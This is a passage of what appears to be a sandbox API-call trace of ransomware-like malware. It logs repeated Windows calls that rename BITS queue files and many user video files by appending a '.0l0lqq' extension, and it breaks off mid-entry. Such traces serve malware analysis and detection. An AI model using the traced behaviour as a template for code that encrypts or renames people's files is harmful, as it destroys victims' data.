SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dda0) returned 1 [0253.233] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd9c) returned 1 [0253.233] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dda0) returned 1 [0253.233] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd9c) returned 1 [0253.234] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr0.dat", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr0.dat", lpFilePart=0x0) returned 0x39 [0253.234] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dc78) returned 1 [0253.234] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dc74) returned 1 [0253.480] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dc60) returned 1 [0253.490] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dc5c) returned 1 [0253.581] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dd04) returned 1 [0253.581] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd00) returned 1 [0253.581] MoveFileW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr0.dat" (normalized: "c:\\users\\all users\\microsoft\\network\\downloader\\qmgr0.dat"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr0.dat.0l0lqq" (normalized: "c:\\users\\all users\\microsoft\\network\\downloader\\qmgr0.dat.0l0lqq")) returned 1 [0253.587] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0253.588] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0253.588] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0253.588] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0253.588] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0253.588] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0253.588] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dd40) returned 1 [0253.588] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd3c) returned 1 [0253.588] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dda0) returned 1 [0253.588] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd9c) returned 1 [0253.588] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dda0) returned 1 [0253.588] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd9c) returned 1 [0253.589] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr1.dat", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr1.dat", lpFilePart=0x0) returned 0x39 [0253.589] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dc78) returned 1 [0253.589] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dc74) returned 1 [0253.857] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dc60) returned 1 [0253.866] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dc5c) returned 1 [0253.940] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dd04) returned 1 [0253.940] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd00) returned 1 [0253.940] MoveFileW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr1.dat" (normalized: "c:\\users\\all users\\microsoft\\network\\downloader\\qmgr1.dat"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr1.dat.0l0lqq" (normalized: "c:\\users\\all users\\microsoft\\network\\downloader\\qmgr1.dat.0l0lqq")) returned 1 [0253.944] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0253.945] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0253.945] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0253.945] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0253.945] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0253.945] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0253.945] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0253.946] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0253.946] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0253.946] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0253.946] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0253.946] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0253.946] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0253.947] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0253.947] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0253.947] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0253.947] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0253.947] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0253.947] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0253.947] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0253.947] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0253.947] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0253.947] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0253.947] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0253.947] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0253.948] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0253.948] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0253.948] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0253.948] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0253.948] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0253.948] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0253.950] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0253.950] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0253.950] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0253.951] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0253.951] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0253.951] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0253.951] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0253.951] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0253.951] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0253.951] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0253.951] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0253.951] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0253.968] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0253.968] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0253.968] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0253.968] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0253.968] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0253.968] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0253.968] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0253.968] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0253.968] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0253.968] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0253.968] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0253.968] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0253.969] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0253.969] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0253.969] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0253.969] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0253.969] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0253.969] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0253.971] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0253.971] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0253.971] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0253.972] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0253.972] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0253.972] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0253.972] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0253.972] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0253.972] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0253.972] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0253.972] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0253.972] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0253.972] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0253.972] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0253.972] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0253.973] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0253.973] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0253.973] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0253.974] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0253.974] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0253.974] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0253.974] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0253.974] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0253.974] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0253.974] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0253.974] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0253.974] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0253.975] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0253.975] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0253.975] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0253.975] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0253.975] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0253.975] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0253.975] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0253.975] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0253.975] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0253.976] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0253.976] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0253.976] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0253.976] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0253.976] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0253.976] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0253.976] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0253.976] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0253.976] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0253.977] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0253.977] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0253.977] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0253.978] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0253.978] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0253.978] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0253.978] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0253.978] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0253.978] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0253.979] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0253.979] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0253.979] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0253.980] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0253.980] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0253.980] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0253.983] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0253.983] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0253.983] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0253.985] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0253.985] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0253.985] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0253.987] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0253.987] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0253.987] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0253.988] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0253.988] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0253.988] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0253.990] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0253.990] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0253.990] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0253.990] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0253.990] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0253.990] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0253.990] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0253.990] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0253.990] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0254.081] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png", lpFilePart=0x0) returned 0x65 [0254.165] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png", lpFilePart=0x0) returned 0x66 [0254.221] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png", lpFilePart=0x0) returned 0x63 [0254.237] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png", lpFilePart=0x0) returned 0x64 [0254.337] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\85dWW4.avi", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\85dWW4.avi", lpFilePart=0x0) returned 0x2f [0254.342] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\85dWW4.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\85dww4.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\85dWW4.avi.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\85dww4.avi.0l0lqq")) returned 1 [0254.346] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cthaP3FLP1Cz5H1G.mp4", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cthaP3FLP1Cz5H1G.mp4", lpFilePart=0x0) returned 0x39 [0254.350] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cthaP3FLP1Cz5H1G.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\cthap3flp1cz5h1g.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cthaP3FLP1Cz5H1G.mp4.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\cthap3flp1cz5h1g.mp4.0l0lqq")) returned 1 [0254.354] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Kszf.mp4", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Kszf.mp4", lpFilePart=0x0) returned 0x2d [0254.371] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Kszf.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\kszf.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Kszf.mp4.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\kszf.mp4.0l0lqq")) returned 1 [0254.376] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\IbjElj86_BfHmLV\\-BpsHz9fGOJBqa1U6G.avi", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\IbjElj86_BfHmLV\\-BpsHz9fGOJBqa1U6G.avi", lpFilePart=0x0) returned 0x4b [0254.382] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\IbjElj86_BfHmLV\\-BpsHz9fGOJBqa1U6G.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ibjelj86_bfhmlv\\-bpshz9fgojbqa1u6g.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\IbjElj86_BfHmLV\\-BpsHz9fGOJBqa1U6G.avi.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ibjelj86_bfhmlv\\-bpshz9fgojbqa1u6g.avi.0l0lqq")) returned 1 [0254.387] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\IbjElj86_BfHmLV\\20F_bEN.mp4", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\IbjElj86_BfHmLV\\20F_bEN.mp4", lpFilePart=0x0) returned 0x40 [0254.394] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\IbjElj86_BfHmLV\\20F_bEN.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ibjelj86_bfhmlv\\20f_ben.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\IbjElj86_BfHmLV\\20F_bEN.mp4.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ibjelj86_bfhmlv\\20f_ben.mp4.0l0lqq")) returned 1 [0254.399] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\IbjElj86_BfHmLV\\Ep5f.mkv", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\IbjElj86_BfHmLV\\Ep5f.mkv", lpFilePart=0x0) returned 0x3d [0254.403] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\IbjElj86_BfHmLV\\Ep5f.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ibjelj86_bfhmlv\\ep5f.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\IbjElj86_BfHmLV\\Ep5f.mkv.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ibjelj86_bfhmlv\\ep5f.mkv.0l0lqq")) returned 1 [0254.406] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\IbjElj86_BfHmLV\\_HGY7\\kvNsuzvNoY-YVssX.mkv", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\IbjElj86_BfHmLV\\_HGY7\\kvNsuzvNoY-YVssX.mkv", lpFilePart=0x0) returned 0x4f [0254.412] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\IbjElj86_BfHmLV\\_HGY7\\kvNsuzvNoY-YVssX.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ibjelj86_bfhmlv\\_hgy7\\kvnsuzvnoy-yvssx.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\IbjElj86_BfHmLV\\_HGY7\\kvNsuzvNoY-YVssX.mkv.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ibjelj86_bfhmlv\\_hgy7\\kvnsuzvnoy-yvssx.mkv.0l0lqq")) returned 1 [0254.415] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\IbjElj86_BfHmLV\\OIcoe1sL\\H81Ot72.avi", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\IbjElj86_BfHmLV\\OIcoe1sL\\H81Ot72.avi", lpFilePart=0x0) returned 0x49 [0254.419] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\IbjElj86_BfHmLV\\OIcoe1sL\\H81Ot72.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ibjelj86_bfhmlv\\oicoe1sl\\h81ot72.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\IbjElj86_BfHmLV\\OIcoe1sL\\H81Ot72.avi.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ibjelj86_bfhmlv\\oicoe1sl\\h81ot72.avi.0l0lqq")) returned 1 [0254.422] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\IbjElj86_BfHmLV\\i_8Kn5P_poR6FuH\\b3Mn5FVUmUe_5PV4h.mp4", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\IbjElj86_BfHmLV\\i_8Kn5P_poR6FuH\\b3Mn5FVUmUe_5PV4h.mp4", lpFilePart=0x0) returned 0x5a [0254.428] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\IbjElj86_BfHmLV\\i_8Kn5P_poR6FuH\\b3Mn5FVUmUe_5PV4h.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ibjelj86_bfhmlv\\i_8kn5p_por6fuh\\b3mn5fvumue_5pv4h.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\IbjElj86_BfHmLV\\i_8Kn5P_poR6FuH\\b3Mn5FVUmUe_5PV4h.mp4.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ibjelj86_bfhmlv\\i_8kn5p_por6fuh\\b3mn5fvumue_5pv4h.mp4.0l0lqq")) returned 1 [0254.431] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\IbjElj86_BfHmLV\\i_8Kn5P_poR6FuH\\jtRQz9HziqSF.mkv", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\IbjElj86_BfHmLV\\i_8Kn5P_poR6FuH\\jtRQz9HziqSF.mkv", lpFilePart=0x0) returned 0x55 [0254.438] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\IbjElj86_BfHmLV\\i_8Kn5P_poR6FuH\\jtRQz9HziqSF.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ibjelj86_bfhmlv\\i_8kn5p_por6fuh\\jtrqz9hziqsf.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\IbjElj86_BfHmLV\\i_8Kn5P_poR6FuH\\jtRQz9HziqSF.mkv.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ibjelj86_bfhmlv\\i_8kn5p_por6fuh\\jtrqz9hziqsf.mkv.0l0lqq")) returned 1 [0254.442] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\IbjElj86_BfHmLV\\0Qxy0vXxZJSJvqnfO\\LCnCcwPa.avi", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS 